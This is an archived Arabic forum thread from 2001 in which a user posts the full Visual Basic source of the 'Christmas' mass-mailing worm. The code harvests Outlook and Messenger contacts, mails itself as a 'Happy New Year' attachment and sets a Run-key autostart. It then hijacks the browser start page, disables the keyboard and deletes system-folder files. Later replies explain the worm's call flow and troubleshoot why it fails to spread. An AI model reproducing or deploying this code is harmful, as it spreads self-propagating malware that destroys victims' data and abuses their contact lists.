الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

فيروس بطاقة الكريستماس

مغلق
بدأه ZaCker again في 24 ديسمبر 2001 · 10 رد · 778 مشاهدة · في منتدى الشبكات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

Zacker او reeezak او maldal

اللي يبي كود الفيروس يحط بريده!

واللي مايبي كود الفيروس لايحط بريده!

#2

السلام عليكم

ممكن تعلمنا الفيروس معمول على اي لغة وتوضح اكثر ايش عمل الفيروس .

وهذا بريدي :

fawaznet@hotmail.com

#3

----

#4

الله يستر

#5

الأخوة الكارم .....

ان كان عندكم ما تفيدونا به فضعوه هنا في المنتدى وأما عن طريق الايميل فنحن لا نفضل ذلك وهذا المنتدى للتعليم العلني وليس عن طريق الايميل ..... !!!!!!

أرجو التنبه ... وشكرا

واثق الخطوة يمشي ملكا !!

#6

اتمنى الاشتفاده من الكود وعدم تدمير الناس به

لاني مابي تدمير ولكن ابي تحطيم لاهنتو ;)

بلغة الفيجوال بيسك واللي مسويه واحد اسمه ZaCker

اهم شي في الكود هو كود الاوت لووك لانهم ما اكتشفوه حتى الان

يعني سو فيروس وحط كود الاوت لووك وراح ينشر نفسه

1- ينتقل عن طريق الاوت لووك والدرايف اللي مسوى عليه مشاركه

2-ينتشر عن طريق اي موقع في الجهاز وذلك بعد ان يضع رابط في اي موقع ..لموقع الفيروس اللي راح ينزل الفيروس بمجرد الدخول للسايت

لكن مع الاسف صادو هالثغره قبل امس !!

3-ينشر نفسه عن طريق الميرك بسكربت جديد يخلي اي واحد يدخل التشانل ..يدخل السايت حق الفيروس

للمعلومات عن الفيروس روحو لهالموقع

http://www.ca.com

معلومات عن الفيروس بالكامل :

http://www.f-secure.com/v-descs/cmas.shtml

وهذا هو الكود ياحلوين:

Private Sub Form_Load()

On Error Resume Next

Me.Hide

Set fso = CreateObject("scripting.filesystemobject")

Set wo = fso.getspecialfolder(0)

FileCopy App.Path & "" & App.EXEName & ".exe", wo & "" & "Christmas.exe"

Set MsgrObj = CreateObject("Messenger.MsgrObject")

Set users = MsgrObj.List(0)

For s = 0 To users.Count

If s = 0 Then

temp = temp + users.Item(s).EmailAddress

Else

temp = temp + ";" + users.Item(s).EmailAddress

End If

Next

Set WW = CreateObject("Outlook.Application")

Set HT = WW.GetNameSpace("MAPI").GetDefaultFolder(10).Items

E = HT.Count

ReDim m(E)

For i = 1 To E

E = E - 1

m(E) = HT.Item(i).Email1Address

If i = 1 Then

Mail = m(E)

Else

Mail = Mail + ";" + m(E)

End If

Next

Text1.Text = Mail + ";" + temp

Call snd

End Sub

Sub mout()

On Error Resume Next

Set sss = CreateObject("wscript.shell")

Set fso = CreateObject("scripting.filesystemobject")

Set wo = fso.getspecialfolder(0)

Set so = fso.getspecialfolder(1)

sss.regwrite "HKEY_LOCAL_MACHINESystemCurrentControlSetControlComputerNameComputerNameComputerName", "ZaCker"

sss.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunZacker", wo & "" & "Christmas.exe"

sss.regwrite "HKCUsoftwaremicrosoftinternet Explorermainstart Page", "http://geocities.com/jobreee/ZaCker.htm"

If sss.regread("HKEY_CURRENT_USERSoftwareMicrosoft") <> "5" Then

Me.Show

sss.regwrite "HKEY_CURRENT_USERSoftwareMicrosoft", "5"

Shell (wo & "" & "Christmas.exe")

End If

Shell "rundll32.exe keyboard,disable", vbNormalFocus

Kill (so & "" & "*.*")

End Sub

Sub snd()

On Error Resume Next

Set MLL = CreateObject("Outlook.Application")

Set Uss = MLL.GetNameSpace("MAPI")

Set MMM = MLL.CreateItem(0)

MMM.To = Text1.Text

MMM.Subject = "Happy New Year"

MMM.Body = "Hii" & vbCrLf & "I can't describe my feelings" & vbCrLf & "But all i can say is" & vbCrLf & "Happy New Year :)" & vbCrLf & " bye"

MMM.attachments.Add wo & "" & "Christmas.exe"

MMM.Send

Call mout

End Sub

عن قريب كود فيروس السلام او التصويت Vote@mm

في امان الله

#7

نسيت اقول

تراه ينتقل عن طريق اخذ اي ايميل في المسنجر

وهالحركه جديده استفيدو منها!!

وكلها من بركات هالمنتدى

باااااي

#8

---------

#9

call mout

يعني ارسل نداء للوظيفه mout

اليه عمل الفيروس:

حدث load

وهو حدث التحميل او مايشتغل يجمع العناوين

بعدين يسوي call لوظيفة الارسال

وبعد وظيفة الارسال يسوي call لوظيفة mout

ووظيفة mout هي حقت التدمير

وبس...يعني لوشلته الكلمه call mout ماراح يسوي نداء لها وبذلك الفيروس راح ينتشر ولاهوب مدمر!!

سلام

#10

--------

#11

سلام

اول شي الفيروس راح يجمع الايميلات من دفتر العناوين حق الاوت لووك اكسبرس.

ويجمع عناوين الاشخاص اللي انت مضيفهم في المسنجر.

الفيروس انتشر ولافيه اي مشكله...انا اتوقع ان العيب من عندك ..

احتمالات:

1- يمكن انت مغير نداءات الوظايف

2-او ماسجلت عناوين في الدفتر او ان اعدادات الاوت لووك ..فيها شي!

لانه ينتشر عن طريق الاوت لووك وليس الاوت لووك اكسبرس !

3-حاول تكتشف الخطا بأنك تشيل جملة on error resume next

من رأس الوظيفه الموجود فيها كود الارسال ..مو كود التجميع!

4-انت جرب الكود ثم رح للاوت بوكس حق الاوت لووك ..(البريد الصادر)

ان لقيت فيه شي فاعرف ان الفيروس نشر نفسه والعيب من اعدادات الارسال ..لان الفيروس لما يحط نفسه هناك فهو خلص اللي عليه والباقي اتوقع انه من ملقم الصادر ...:)

في امان الله

هذا الموضوع مغلق.

مواضيع مشابهة